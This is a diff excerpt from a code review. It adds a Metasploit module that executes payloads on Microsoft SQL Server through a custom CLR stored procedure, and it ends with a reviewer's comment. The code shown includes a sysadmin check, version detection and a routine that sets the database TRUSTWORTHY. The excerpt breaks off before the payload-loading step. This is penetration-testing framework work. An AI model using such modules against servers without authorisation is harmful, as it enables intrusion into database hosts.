modules/exploits/windows/mssql/mssql_clr_payload.rb

```diff
@@ -0,0 +1,212 @@
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::MSSQL
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft SQL Server Clr Stored Procedure Payload Execution',
+      'Description'    => %q{
+        This module executes an arbitrary native payload on a Microsoft SQL
+        server by loading a custom SQL CLR Assembly into the target SQL
+        installation, and calling it directly with a base64-encoded payload.
+
+        The module requires working credentials in order to connect directly to the
+        MSSQL Server.
+
+        This method requires the user to have sufficient privileges to install a custom
+        SQL CRL DLL, and invoke the custom stored procedure that comes with it.
+
+        This exploit does not leave any binaries on disk.
+
+        Tested on MS SQL Server versions: 2005, 2012, 2016 (all x64).
+      },
+      'Author'         =>
+        [
+          'Lee Christensen',  # original idea/research
+          'Nathan Kirk',      # extra research/blog post
+          'OJ Reeves'         # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/']
+        ],
+      'Platform'       => 'win',
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        => [['Automatic', {}]],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 01 1999'
+    ))
+
+    register_options(
+      [
+        OptString.new('DATABASE', [true, 'The database to load the CLR Assembly into.', 'master'])
+      ])
+  end
+
+  def check
+    unless mssql_login_datastore(datastore['DATABASE'])
+      vprint_status('Invalid SQL Server credentials')
+      return Exploit::CheckCode::Detected
+    end
+
+    version = get_sql_version_string
+
+    unless version =~ /Server 20(05|08|12|14|16)/
+      vprint_status('Unsupported version of SQL Server')
+      return Exploit::CheckCode::Safe
+    end
+
+    if mssql_is_sysadmin
+      vprint_good "User #{datastore['USERNAME']} is a sysadmin"
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  ensure
+    disconnect
+  end
+
+  def get_sql_version_string
+    mssql_query("select @@version", false)[:rows].first[0]
+  end
+
+  def get_sql_architecture(sql_version_string)
+    if sql_version_string =~ /(64-bit|x64)/i
+      ARCH_X64
+    else
+      ARCH_X86
+    end
+  end
+
+  def get_exploit_version(sql_version_string)
+    # keeping it simple at this point.
+    if sql_version_string =~ /Server (2005|2008|2012)/
+      'v3.5'
+    else
+      # assume 2014/2016 at this point.
+      'v4.0'
+    end
+  end
+
+  def set_trustworthy(on)
+      mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false)
```

Comment:
Seems like `db_name()` would reduce the burden on the user to know stuff about the victim. Is there a particular need for this to be a user option?